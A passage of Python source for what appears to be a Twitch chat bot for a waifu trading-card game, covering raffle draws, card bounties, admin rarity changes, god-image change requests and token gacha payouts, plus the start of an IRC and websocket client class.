cur.execute(
"SELECT raffle_tickets.userid, users.name FROM raffle_tickets INNER JOIN users ON raffle_tickets.userid = users.id WHERE raffle_tickets.raffleid = %s AND raffle_tickets.num_winners < raffle_tickets.num_tickets ORDER BY -LOG(1-RAND())/(num_tickets - num_winners) LIMIT 1",
[raffle_info[0]])
winner = cur.fetchone()
if winner is None:
# completely out of non-winning tickets
break
# add their name to the winner list
winners.append(winner[1])
# update their ticket entry
cur.execute(
"UPDATE raffle_tickets SET num_winners = num_winners + 1, updated = %s WHERE raffleid = %s AND userid = %s",
[current_milli_time(), raffle_info[0], winner[0]])
if len(winners) == 0:
self.message(channel,
"Drew no new minor prize winners - the system is out of non-winning tickets!",
isWhisper)
elif len(winners) < num_winners:
self.message(channel, "Drew %d minor prize winners (truncated) - %s !" % (
len(winners), ", ".join(winners)), isWhisper)
else:
self.message(channel,
"Drew %d minor prize winners - %s !" % (len(winners), ", ".join(winners)),
isWhisper)
return
if subcmd == 'pickgrand' or subcmd == 'drawgrand':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
if len(args) >= 2:
self.message(channel, "!raffle drawgrand only draws one winner at once.", isWhisper)
return
cur.execute(
"SELECT raffle_tickets.userid, users.name FROM raffle_tickets INNER JOIN users ON raffle_tickets.userid = users.id WHERE raffle_tickets.raffleid = %s AND raffle_tickets.num_winners < raffle_tickets.num_tickets AND raffle_tickets.won_grand = 0 ORDER BY -LOG(1-RAND())/(num_tickets - num_winners) LIMIT 1",
[raffle_info[0]])
winner = cur.fetchone()
if winner is None:
# completely out of non-winning tickets
self.message(channel,
"Could not draw a new grand prize winner as there are no applicable users left!",
isWhisper)
return
# update their ticket entry
cur.execute(
"UPDATE raffle_tickets SET num_winners = num_winners + 1, won_grand = 1, updated = %s WHERE raffleid = %s AND userid = %s",
[current_milli_time(), raffle_info[0], winner[0]])
self.message(channel, "Drew a new grand prize winner: %s!" % winner[1])
return
if command == "bounty":
if len(args) == 0:
self.message(channel,
"Usage: !bounty <ID> <amount> / !bounty list / !bounty check <ID> / !bounty cancel <ID>",
isWhisper=isWhisper)
return
subcmd = args[0].lower()
# support !bounty ID amount to place an order
if subcmd not in ['check', 'place', 'add', 'list', 'cancel']:
args = ['place'] + args
subcmd = 'place'
if subcmd == "check":
if len(args) != 2:
self.message(channel, "Usage: !bounty check <ID>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
if waifu['base_rarity'] >= int(config["numNormalRarities"]):
self.message(channel, "Bounties cannot be placed on special waifus.", isWhisper)
return
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*), COALESCE(MAX(amount), 0) FROM bounties WHERE waifuid = %s AND status='open'",
[waifu['id']])
allordersinfo = cur.fetchone()
if allordersinfo[0] == 0:
self.message(channel,
"[{id}] {name} has no bounties right now.".format(id=waifu['id'],
name=waifu['name']),
isWhisper)
return
cur.execute(
"SELECT amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
minfo = {"count": allordersinfo[0], "id": waifu['id'], "name": waifu['name'],
"highest": allordersinfo[1]}
if myorderinfo is not None:
minfo["mine"] = myorderinfo[0]
if myorderinfo[0] == allordersinfo[1]:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. You are the highest bidder at {highest} points.".format(
**minfo), isWhisper)
else:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. Your bid of {mine} points is lower than the highest bid of {highest} points.".format(
**minfo), isWhisper)
else:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. The highest bid is {highest} points. You don't have a bounty on this waifu right now.".format(
**minfo), isWhisper)
except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if subcmd == "list":
cur = db.cursor()
cur.execute(
"SELECT waifuid, amount, waifus.name FROM bounties JOIN waifus ON bounties.waifuid = waifus.id WHERE userid = %s AND status='open'",
[tags['user-id']])
buyorders = cur.fetchall()
cur.close()
if len(buyorders) == 0:
self.message(channel,
"%s, you don't have any bounties active right now!" % tags['display-name'],
isWhisper)
return
messages = ["%s, you have %d active bounties: " % (tags['display-name'], len(buyorders))]
for order in buyorders:
message = "[%d] %s for %d points; " % (order[0], order[2], order[1])
if len(message) + len(messages[-1]) > 400:
messages.append(message)
else:
messages[-1] += message
for message in messages:
self.message(channel, message, isWhisper)
return
if subcmd == "place" or subcmd == "add":
if len(args) < 3:
self.message(channel, "Usage: !bounty <ID> <amount>", isWhisper)
return
if not followsme(tags['user-id']):
self.message(channel,
"%s, you must follow the bot to use bounties so you can be sent a whisper if your order is filled." %
tags['display-name'], isWhisper)
return
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
if waifu['base_rarity'] >= int(config["numNormalRarities"]):
self.message(channel, "Bounties cannot be placed on special waifus.", isWhisper)
return
amount = int(args[2])
# check for a current order
cur = db.cursor()
cur.execute(
"SELECT id, amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
if myorderinfo is not None and myorderinfo[1] == amount:
self.message(channel,
"%s, you already have a bounty in place for that waifu for that exact amount." %
tags['display-name'], isWhisper)
cur.close()
return
# check for affordability
old_bounty = 0 if myorderinfo is None else myorderinfo[1]
points_delta = amount if myorderinfo is None else amount - myorderinfo[1]
if points_delta > 0 and not hasPoints(tags['user-id'], points_delta):
if myorderinfo is None:
self.message(channel,
"%s, you don't have enough points to place a bounty with that amount." %
tags['display-name'], isWhisper)
else:
self.message(channel,
"%s, you don't have enough points to increase your bounty to that amount." %
tags['display-name'], isWhisper)
cur.close()
return
# check for hand space
if myorderinfo is None and currentCards(tags['user-id']) >= handLimit(tags['user-id']):
self.message(channel, "%s, you don't have a free hand space to make a new bounty!" % tags[
'display-name'], isWhisper)
cur.close()
return
# check the range
cur.execute(
"SELECT COALESCE(MAX(amount), 0) FROM bounties WHERE userid != %s AND waifuid = %s AND status = 'open'",
[tags['user-id'], waifu['id']])
highest_other_bid = cur.fetchone()[0]
de_value = int(config["rarity%dValue" % waifu['base_rarity']])
min_amount = int(config["rarity%dMinBounty" % waifu['base_rarity']])
rarity_cap = int(config["rarity%dMaxBounty" % waifu['base_rarity']])
max_amount = max(rarity_cap, highest_other_bid * 6 // 5)
if amount < min_amount or amount > max_amount:
self.message(channel,
"%s, your bounty for this waifu must fall between %d and %d points." % (
tags['display-name'], min_amount, max_amount), isWhisper)
cur.close()
return
# outbidding?
outbidding = highest_other_bid != 0 and amount > highest_other_bid and old_bounty < highest_other_bid
minimum_outbid = max(highest_other_bid // 20, 5)
if outbidding:
if amount < highest_other_bid + minimum_outbid:
self.message(channel,
"%s, you must place a bounty of at least %d points to outbid the current highest bid of %d points." % (
tags['display-name'], highest_other_bid + minimum_outbid,
highest_other_bid), isWhisper)
cur.close()
return
elif amount < old_bounty and highest_other_bid + minimum_outbid > amount and amount > highest_other_bid:
self.message(channel,
"%s, the lowest you can reduce your bounty to is %d points due to the bid of %d points below it." % (
tags['display-name'], highest_other_bid + minimum_outbid,
highest_other_bid))
cur.close()
return
# check for duplicate amount
cur.execute(
"SELECT COUNT(*) FROM bounties WHERE waifuid = %s AND status = 'open' AND amount = %s",
[waifu['id'], amount])
dupe_amt = cur.fetchone()[0]
if dupe_amt > 0:
self.message(channel,
"%s, someone else has already placed a bounty on that waifu for %d points. Choose another amount." % (
tags['display-name'], amount), isWhisper)
cur.close()
return
# actions that require confirmation first
if len(args) < 4 or args[3].lower() != 'yes':
# check for placing a bounty that has already been outbid
if highest_other_bid > amount:
msgargs = (tags['display-name'], highest_other_bid, waifu['id'], amount)
if myorderinfo is None:
self.message(channel,
'%s, are you sure you want to place a bounty for lower than the current highest bid (%d points)? Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
else:
self.message(channel,
'%s, are you sure you want to change your bounty to a lower amount than the current other highest bid (%d points)? Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
cur.close()
return
# check for placing a bounty above regular cap
if amount > rarity_cap:
amount_refund = (amount - rarity_cap) // 2 + rarity_cap
msgargs = (tags['display-name'], amount_refund, waifu['id'], amount)
self.message(channel,
'%s, are you sure you want to place a bounty above the normal cap for that waifu\'s rarity? If you cancel it, you will only receive %d points back unless a higher bounty than yours is filled. Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
cur.close()
return
# if it passed all of those checks it should be good to go.
# penalize them for reducing a bounty above regular cap?
if points_delta < 0 and old_bounty > rarity_cap:
change_above_cap = min(-points_delta, old_bounty - rarity_cap)
addPoints(tags['user-id'], change_above_cap // 2 + (-points_delta - change_above_cap))
else:
addPoints(tags['user-id'], -points_delta)
if myorderinfo is None:
cur.execute(
"INSERT INTO bounties (userid, waifuid, amount, status, created) VALUES(%s, %s, %s, 'open', %s)",
[tags['user-id'], waifu['id'], amount, current_milli_time()])
self.message(channel, "%s, you placed a new bounty on [%d] %s for %d points." % (
tags['display-name'], waifu['id'], waifu['name'], amount), isWhisper)
else:
cur.execute("UPDATE bounties SET amount = %s, updated = %s WHERE id = %s",
[amount, current_milli_time(), myorderinfo[0]])
self.message(channel, "%s, you updated your bounty on [%d] %s to %d points." % (
tags['display-name'], waifu['id'], waifu['name'], amount), isWhisper)
# outbid message?
if outbidding:
# attempt to whisper for outbid
cur.execute(
"SELECT users.name FROM bounties JOIN users ON bounties.userid=users.id WHERE bounties.waifuid = %s AND bounties.amount = %s AND bounties.status = 'open' LIMIT 1",
[waifu['id'], highest_other_bid])
other_bidder = cur.fetchone()
if other_bidder is not None:
self.message('#%s' % other_bidder[0],
"Your bounty on [%d] %s has been outbid. The new highest bounty is %d points." % (
waifu['id'], waifu['name'], amount), True)
cur.close()
return
except Exception as exc:
self.message(channel, "Usage: !bounty <ID> <amount>", isWhisper=isWhisper)
return
if subcmd == "cancel":
if len(args) != 2:
self.message(channel, "Usage: !bounty cancel <ID>", isWhisper=isWhisper)
return
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
# check for a current order
cur = db.cursor()
cur.execute(
"SELECT id, amount, created, updated FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
bounty_time = myorderinfo[3] if myorderinfo[3] is not None else myorderinfo[2]
if myorderinfo is not None:
cur.execute("UPDATE bounties SET status = 'cancelled', updated = %s WHERE id = %s",
[current_milli_time(), myorderinfo[0]])
# penalise them?
rarity_cap = int(config["rarity%dMaxBounty" % waifu['base_rarity']])
# free cancel after direct outbid was met?
cur.execute(
"SELECT COUNT(*) FROM bounties WHERE waifuid = %s AND status='filled' AND updated > %s",
[waifu['id'], bounty_time])
free_cancel = cur.fetchone()[0] > 0
if myorderinfo[1] > rarity_cap and not free_cancel:
refund = (myorderinfo[1] - rarity_cap) // 2 + rarity_cap
addPoints(tags['user-id'], refund)
self.message(channel,
"%s, you cancelled your bounty for [%d] %s and received only %d points back since it was above cap." % (
tags['display-name'], waifu['id'], waifu['name'], refund), isWhisper)
else:
addPoints(tags['user-id'], myorderinfo[1])
self.message(channel,
"%s, you cancelled your bounty for [%d] %s and received your %d points back." % (
tags['display-name'], waifu['id'], waifu['name'], myorderinfo[1]),
isWhisper)
else:
self.message(channel,
"%s, you don't have an active bounty for that waifu!" % tags['display-name'],
isWhisper)
cur.close()
return
except Exception:
self.message(channel, "Usage: !bounty cancel <ID>", isWhisper=isWhisper)
return
if command == "raritychange" and sender in superadmins:
hasConfirmed = False
if len(args) > 0 and args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
if len(args) < 2:
self.message(channel, "Usage: !raritychange <ID> <rarity>", isWhisper)
return
try:
waifu = getWaifuById(args[0])
assert waifu is not None
rarity = parseRarity(args[1])
except Exception:
self.message(channel, "Usage: !raritychange <ID> <rarity>", isWhisper)
return
if waifu['base_rarity'] == int(config['numNormalRarities']):
self.message(channel, "You shouldn't be changing a special waifu into another rarity.", isWhisper)
return
if rarity == waifu['base_rarity']:
self.message(channel, "[%d] %s is already %s base rarity!" % (
waifu['id'], waifu['name'], config['rarity%dName' % rarity]), isWhisper)
return
if not hasConfirmed and rarity > waifu['base_rarity'] and waifu['base_rarity'] < int(config["numNormalRarities"]) - 1:
# check for promoted copies existing
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM has_waifu WHERE waifuid = %s AND rarity BETWEEN %s AND %s", [waifu['id'], waifu['base_rarity'] + 1, int(config["numNormalRarities"]) - 1])
if cur.fetchone()[0] > 0:
self.message(channel, "WARNING: You are trying to increase the rarity of a card which people have already promoted. This may cause undesirable results. Append ' yes' to your command if you want to do this anyway.", isWhisper)
return
# limit check
oldRarityLimit = int(config['rarity%dMax' % waifu['base_rarity']])
newRarityLimit = int(config['rarity%dMax' % rarity])
if newRarityLimit != 0 and (oldRarityLimit == 0 or oldRarityLimit > newRarityLimit):
with db.cursor() as cur:
cur.execute(
"SELECT (SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE waifuid = %s) + (SELECT COUNT(*) FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid=boosters_opened.id WHERE boosters_cards.waifuid = %s AND boosters_opened.status = 'open')",
[waifu['id'], waifu['id']])
currentOwned = cur.fetchone()[0]
if currentOwned > newRarityLimit:
errorArgs = (
waifu['id'], waifu['name'], config['rarity%dName' % rarity], currentOwned, newRarityLimit)
self.message(channel,
"[%d] %s cannot be changed to %s base rarity. There are %d copies of her already owned while the limit at the new rarity would be %d." % errorArgs,
isWhisper)
return
# okay, do it
with db.cursor() as cur:
if rarity < int(config['numNormalRarities']):
cur.execute("UPDATE waifus SET normal_weighting = LEAST(GREATEST(normal_weighting, (SELECT MIN(w1.normal_weighting) FROM (SELECT * FROM waifus) w1 WHERE w1.base_rarity = %s)), (SELECT MAX(w2.normal_weighting) FROM (SELECT * FROM waifus) w2 WHERE w2.base_rarity = %s)), base_rarity = %s WHERE id = %s", [rarity, rarity, rarity, waifu['id']])
else:
cur.execute("UPDATE waifus SET base_rarity = %s WHERE id = %s", [rarity, waifu['id']])
cur.execute("SELECT userid, amount FROM has_waifu WHERE waifuid = %s AND rarity < %s", [waifu['id'], rarity])
lowerCopies = cur.fetchall()
if len(lowerCopies) > 0:
cur.execute("DELETE FROM has_waifu WHERE waifuid = %s AND rarity < %s", [waifu['id'], rarity])
for copy in lowerCopies:
giveCard(copy[0], waifu['id'], rarity, copy[1])
attemptPromotions(waifu['id'])
# cancel all bounties
cur.execute(
"SELECT bounties.userid, users.name, bounties.amount FROM bounties JOIN users ON bounties.userid = users.id WHERE bounties.waifuid = %s AND bounties.status = 'open'",
[waifu['id']])
bounties = cur.fetchall()
for bounty in bounties:
addPoints(bounty[0], bounty[2])
self.message('#%s' % bounty[1],
"Your bounty for [%d] %s has been cancelled due to its rarity changing. Your %d points have been refunded." % (
waifu['id'], waifu['name'], bounty[2]), True)
cur.execute(
"UPDATE bounties SET status='cancelled', updated=%s WHERE waifuid = %s AND status='open'",
[current_milli_time(), waifu['id']])
if rarity >= int(config["numNormalRarities"]):
cur.execute("UPDATE users SET favourite = 1 WHERE favourite = %s AND (SELECT COUNT(*) FROM has_waifu WHERE has_waifu.userid = users.id AND has_waifu.waifuid = %s) = 0", [waifu['id']] * 2)
# done
self.message(channel, "Successfully changed [%d] %s's base rarity to %s." % (
waifu['id'], waifu['name'], config['rarity%dName' % rarity]), isWhisper)
return
if command == "profile":
if len(args) == 0:
self.message(channel, tags["display-name"] + ", your profile: " + config[
"siteHost"] + "/profile?user=" + str(sender), isWhisper)
return
elif args[0] == "favourite" or args[0] == "favorite":
newFav = 0
try:
newFav = int(args[1])
except ValueError:
self.message(channel, args[1] + " is not a number. Please try again.")
return
newFavW = getWaifuById(newFav)
if newFavW is None:
self.message(channel, "That Waifu doesn't exist! Try again!", isWhisper)
return
canLookup = newFavW["can_lookup"] == 1
hasOrIsLowRarity = False
if int(newFavW["base_rarity"]) > 7:
logger.debug(sender + " requested to set " + str(
newFav) + " as his new Favourite Waifu, which is promo or above. Checking if they have it...")
hand = getHand(tags["user-id"])
for w in hand:
if str(w["id"]) == str(newFav):
hasOrIsLowRarity = True
break
else:
hasOrIsLowRarity = True
if not canLookup and not hasOrIsLowRarity:
self.message(channel, tags[
"display-name"] + ", sorry, but that Waifu doesn't exist. Try a different one!",
isWhisper)
return
elif newFavW["can_favourite"] == 0:
self.message(channel, "%s, sorry, but that Waifu can't be set as your favourite. Try a different one!" % tags['display-name'], isWhisper)
return
elif hasOrIsLowRarity:
self.message(channel, "Updated your favourite Waifu to be " + newFavW["name"] + "! naroDesu",
isWhisper)
setFavourite(tags["user-id"], newFav)
return
else:
self.message(channel, tags[
"display-name"] + ", sorry, but this Waifu is a Special or above, so you need to have it to set it as a favourite!",
isWhisper)
return
elif args[0] == "description":
newDesc = " ".join(args[1:])
logger.debug("New description: " + newDesc)
if len(newDesc) > 1023:
self.message(channel, "That description is too long. Please limit it to 1024 characters.",
isWhisper)
return
setDescription(tags["user-id"], newDesc)
self.message(channel, tags["display-name"] + ", successfully updated your profile description!",
isWhisper)
if command == "fixwaifu":
self.message(channel,
"To submit changes/fixes for any waifu, please go to %s/fixes" % config["siteHost"],
isWhisper)
return
if command == "packspending":
packstats = getPackStats(tags["user-id"])
if len(packstats) == 0:
self.message(channel,
"%s, you haven't bought any boosters yet! Buy your first with !booster buy." %
tags['display-name'], isWhisper)
return
totalspending = getSpendings(tags['user-id'])
packstr = ", ".join("%dx %s" % (row[1], row[0]) for row in packstats)
self.message(channel, "%s, you have spent %d total points on the following packs: %s." % (
tags['display-name'], totalspending, packstr), isWhisper)
if checkHandUpgrade(tags["user-id"]):
self.message(channel, "... and this was enough to upgrade your hand to a new slot! naroYay",
isWhisper)
return
if command == "godimage":
canManageImages = sender in superadmins
godRarity = int(config["numNormalRarities"]) - 1
if len(args) < 1:
if canManageImages:
self.message(channel, "Usage: !godimage change / changeglobal / queue / check / acceptsingle / acceptglobal / reject", isWhisper)
else:
self.message(channel, "Usage: !godimage change / changeglobal / list / cancel", isWhisper)
return
subcmd = args[0].lower()
if subcmd in ["change", "changeglobal", "request", "requestglobal"]:
do_global = subcmd in ["changeglobal", "requestglobal"]
if len(args) < 3:
self.message(channel, "Usage: !godimage change[global] <id> <link>", isWhisper)
return
try:
waifuid = int(args[1])
except ValueError:
self.message(channel, "Usage: !godimage change[global] <id> <link>", isWhisper)
return
waifu = getWaifuById(waifuid)
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s", [tags['user-id'], waifuid, godRarity])
if cur.fetchone()[0] == 0:
self.message(channel, "You don't own that waifu at god rarity!", isWhisper)
return
if waifu["base_rarity"] == godRarity:
self.message(channel, "Base god rarity waifus cannot have their picture changed!", isWhisper)
return
if canManageImages:
# automatically do the change
try:
hostedURL = processImageURL(args[2])
except Exception as ex:
self.message(channel, "Could not process image. %s" % str(ex), isWhisper)
return
if do_global:
cur.execute("UPDATE waifus SET image = %s WHERE id = %s", [hostedURL, waifuid])
else:
cur.execute("UPDATE has_waifu SET custom_image = %s WHERE waifuid = %s AND userid = %s AND rarity = %s", [hostedURL, waifuid, tags['user-id'], godRarity])
# log the change for posterity
insertArgs = [tags['user-id'], waifuid, args[2], do_global, tags['user-id'], current_milli_time()]
cur.execute("INSERT INTO godimage_requests (requesterid, waifuid, image, is_global, state, moderatorid, created) VALUES(%s, %s, %s, %s, 'auto_accepted', %s, %s)", insertArgs)
self.message(channel, "Image change processed successfully.", isWhisper)
return
else:
try:
validateImageURL(args[2])
except ValueError as ex:
self.message(channel, "Invalid link specified. %s" % str(ex), isWhisper)
return
except Exception:
self.message(channel, "There was an unknown problem with the link you specified. Please try again later.", isWhisper)
return
# cancel any old pending requests for this waifu
cur.execute("UPDATE godimage_requests SET state = 'cancelled', updated = %s WHERE waifuid = %s AND state = 'pending'", [current_milli_time(), waifuid])
# record a new request
insertArgs = [tags['user-id'], waifuid, args[2], do_global, current_milli_time()]
cur.execute("INSERT INTO godimage_requests (requesterid, waifuid, image, is_global, state, created) VALUES(%s, %s, %s, %s, 'pending', %s)", insertArgs)
# notify the discordhook of the new request
discordArgs = {"user": tags['display-name'], "id": waifuid, "name": waifu["name"], "image": args[2], "type": "a global" if do_global else "an individual"}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} requested {type} image change for [{id}] {name} to <{image}>!\nUse `!godimage check {id}` in any chat to check it.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Your request has been placed. You will be notified when bot staff accept or decline it.", isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT waifus.id, waifus.name FROM godimage_requests gr JOIN waifus ON gr.waifuid = waifus.id WHERE gr.requesterid = %s AND gr.state = 'pending'", [tags['user-id']])
reqs = cur.fetchall()
if len(reqs) == 0:
self.message(channel, "You don't have any pending god image change requests.", isWhisper)
else:
reqList = ", ".join(["[%d] %s" % (req[0], req[1]) for req in reqs])
self.message(channel, "%s, you have pending image change requests for: %s." % (tags['display-name'], reqList), isWhisper)
return
elif subcmd == "cancel":
if len(args) < 2:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
try:
waifuid = int(args[1])
except ValueError:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
waifu = getWaifuById(waifuid)
if waifu is None:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
with db.cursor() as cur:
cur.execute("UPDATE godimage_requests SET state = 'cancelled', updated = %s WHERE requesterid = %s AND waifuid = %s AND state = 'pending'", [current_milli_time(), tags['user-id'], waifuid])
if cur.rowcount > 0:
# send discord notif
discordArgs = {"user": tags['display-name'], "id": waifuid, "name": waifu["name"]}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} cancelled their image change request for [{id}] {name}.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "You cancelled your image change request for [%d] %s." % (waifuid, waifu["name"]), isWhisper)
elif waifu["can_lookup"]:
self.message(channel, "You didn't have a pending image change request for that waifu.", isWhisper)
else:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
elif subcmd == "queue" and canManageImages:
with db.cursor() as cur:
cur.execute("SELECT waifuid FROM godimage_requests WHERE state = 'pending' ORDER BY created ASC")
queue = cur.fetchall()
if len(queue) == 0:
self.message(channel, "The request queue is currently empty.", isWhisper)
else:
queueStr = ", ".join(str(item[0]) for item in queue)
self.message(channel, "Current requested IDs for image changes: %s. !godimage check <id> to see each request." % queueStr, isWhisper)
return
elif canManageImages and subcmd in ["check", "acceptsingle", "acceptglobal", "reject"]:
if len(args) < 2:
self.message(channel, "Usage: !godimage %s <id>" % subcmd, isWhisper)
return
try:
waifuid = int(args[1])
except ValueError:
self.message(channel, "Usage: !godimage %s <id>" % subcmd, isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT gr.id, gr.image, gr.is_global, users.id, users.name, waifus.id, waifus.name FROM godimage_requests gr"
+ " JOIN users ON gr.requesterid = users.id"
+ " JOIN waifus ON gr.waifuid = waifus.id"
+ " WHERE gr.waifuid = %s AND gr.state = 'pending'", [waifuid])
request = cur.fetchone()
if request is None:
self.message(channel, "There is no pending request for that waifu.", isWhisper)
return
if subcmd == "check":
msgArgs = {"user": request[4], "id": request[5], "name": request[6], "image": request[1]}
if request[2]:
self.message(channel, ("{user} requested [{id}] {name}'s global image to be changed to {image} ." +
" You can accept this request with !godimage acceptglobal {id}," +
" change it for only their copy with !godimage acceptsingle {id}," +
" or deny it entirely with !godimage reject {id} <reason>.").format(**msgArgs), isWhisper)
else:
self.message(channel, ("{user} requested their copy of [{id}] {name}'s image to be changed to {image} ." +
" You can accept this request with !godimage acceptsingle {id}" +
" or deny it with !godimage reject {id} <reason>.").format(**msgArgs), isWhisper)
elif subcmd == "reject":
if len(args) < 3:
self.message(channel, "You must provide a reason to reject the request. If it is porn/illegal/etc, just ban the user.", isWhisper)
return
rejectionReason = " ".join(args[2:])
queryArgs = [tags['user-id'], current_milli_time(), rejectionReason, request[0]]
cur.execute("UPDATE godimage_requests SET state = 'rejected', moderatorid = %s, updated = %s, rejection_reason = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[4], "Your image change request for [%d] %s was rejected with the following reason: %s" % (request[5], request[6], rejectionReason), True)
self.message(channel, "Request rejected and user notified.", isWhisper)
elif subcmd == "acceptglobal":
if not request[2]:
self.message(channel, "A non-global request cannot be accepted for a global image change. Use !godimage acceptsingle %d instead." % request[5], isWhisper)
return
# update it
try:
hostedURL = processImageURL(request[1])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
cur.execute("UPDATE waifus SET image = %s WHERE id = %s", [hostedURL, request[5]])
cur.execute("UPDATE has_waifu SET custom_image = NULL WHERE waifuid = %s", [request[5]])
queryArgs = [tags['user-id'], current_milli_time(), request[0]]
cur.execute("UPDATE godimage_requests SET state = 'accepted_global', moderatorid = %s, updated = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[4], "Your global image change request for [%d] %s was accepted, the image has been changed." % (request[5], request[6]), True)
self.message(channel, "Request accepted. The new image for [%d] %s is %s" % (request[5], request[6], hostedURL), isWhisper)
else:
# update it
try:
hostedURL = processImageURL(request[1])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
cur.execute("UPDATE has_waifu SET custom_image = %s WHERE userid = %s AND waifuid = %s AND rarity = %s", [hostedURL, request[3], request[5], godRarity])
queryArgs = [tags['user-id'], current_milli_time(), request[0]]
cur.execute("UPDATE godimage_requests SET state = 'accepted_single', moderatorid = %s, updated = %s WHERE id = %s", queryArgs)
# notify them
if request[2]:
self.message("#%s" % request[4], "Your image change request for [%d] %s was accepted, but only for your own copy." % (request[5], request[6]), True)
else:
self.message("#%s" % request[4], "Your image change request for your copy of [%d] %s was accepted." % (request[5], request[6]), True)
self.message(channel, "Request accepted. The new image for %s's copy of [%d] %s is %s" % (request[4], request[5], request[6], hostedURL), isWhisper)
return
if command == "tokenpromo" or command == "tokenpromos":
self.message(channel, "Token Promo purchases are closed for this year, thanks for playing!", isWhisper)
return
if command == "tokengacha":
self.message(channel, "The Token Gacha is closed for this year, thanks for playing!", isWhisper)
return
if command == "autogacha" and sender in superadmins:
tokenName = config["eventTokenName"]
with db.cursor() as cur:
cur.execute("SELECT id, name, eventTokens FROM users WHERE eventTokens > 0 ORDER BY eventTokens DESC")
holders = cur.fetchall()
for holder in holders:
fullPrizes = []
userid = int(holder[0])
for i in range(int(holder[2])):
roll = tokenGachaRoll()
prizes = []
if "pack" in roll["prize"]:
giveFreeBooster(userid, roll["prize"]["pack"], roll["prize"]["amount"])
prizes.append("%dx %s pack (!freepacks open %s)" % (roll["prize"]["amount"], roll["prize"]["pack"], roll["prize"]["pack"]))
if "points" in roll["prize"]:
addPoints(userid, roll["prize"]["points"])
prizes.append("%d points" % roll["prize"]["points"])
if "pudding" in roll["prize"]:
addPudding(userid, roll["prize"]["pudding"])
prizes.append("%d pudding" % roll["prize"]["pudding"])
fullPrizes.append("[%d◆] %s" % (roll["tier"], " and ".join(prizes)))
messages = ["Your %d leftover %s(s) were fed into the Token Gacha and you got: " % (holder[2], tokenName)]
first = True
for prizeStr in fullPrizes:
if len(messages[-1]) + len(prizeStr) > 398:
messages.append(prizeStr)
elif first:
messages[-1] += prizeStr
else:
messages[-1] += ", " + prizeStr
first = False
for message in messages:
self.message('#' + holder[1], message, True)
cur.execute("UPDATE users SET eventTokens = 0")
self.message(channel, "Done.", isWhisper)
return
class MarathonBot(pydle.Client):
instance = None
pw=None
def __init__(self):
super().__init__(config["marathonChannel"][1:])
MarathonBot.instance = self
self.ffz = MarathonFFZWebsocket(config["marathonChannel"][1:])
def start(self, password):
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=password)
self.pw = password
logger.info("Connecting MarathonBot...")
def on_disconnect(self, expected):
logger.warning("MarathonBot Disconnected, reconnecting....")
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=self.pw, reconnect=True)
def on_connect(self):
super().on_connect()
logger.info("MarathonBot Joining")
def on_message(self, source, target, message):
logger.debug("message on MarathonBot: %s, %s, %s", str(source), str(target), message)
def updateFollowButtons(self, channels):
if self.ffz is None:
self.ffz = MarathonFFZWebsocket(config["marathonChannel"][1:], channels)
else:
self.ffz.updateFollowButtons(channels)
def message(self, *args):
logger.info("MarathonBot Sending "+str(args))
super().message(*args)
class MarathonFFZWebsocket:
def __init__(self, channelName, newFollowButtons=None):
self.channelName = channelName
self.messageNumber = 0
self.queuedChanges = []
self.initDone = False
if newFollowButtons is not None:
self.queuedChanges.append(newFollowButtons)
self.ws = websocket.WebSocketApp(ffzws, on_message = self.on_message, on_error = self.on_error, on_close = self.on_close)
self.ws.on_open = self.on_open
thread.start_new_thread(self.ws.run_forever, (), {"origin": ""})
def sendMessage(self, message):
self.messageNumber += 1
self.ws.send("%d %s" % (self.messageNumber, message))
def on_open(self):
self.sendMessage('hello ["waifutcg-ffzclient",false]')
def on_message(self, message):
logger.debug("Websocket recv: "+message)
code, msg = message.split(" ", 1)
code = int(code)
if code == -1:
# probably authorize
if msg.startswith("do_authorize"):
